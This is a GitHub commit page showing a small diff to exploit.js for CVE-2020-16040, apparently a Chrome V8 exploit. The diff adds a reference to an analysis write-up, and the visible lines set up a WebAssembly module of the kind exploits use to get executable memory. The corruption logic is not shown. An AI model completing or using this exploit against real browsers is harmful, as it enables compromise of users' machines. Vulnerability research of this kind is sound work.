We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent e71209d commit 7be59deCopy full SHA for 7be59de
CVE-2020-16040/exploit.js
@@ -1,4 +1,6 @@
1
-var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
+// Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
2
+
3
+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
4
var wasm_mod = new WebAssembly.Module(wasm_code);
5
var wasm_instance = new WebAssembly.Instance(wasm_mod);
6
var f = wasm_instance.exports.main;
0 commit comments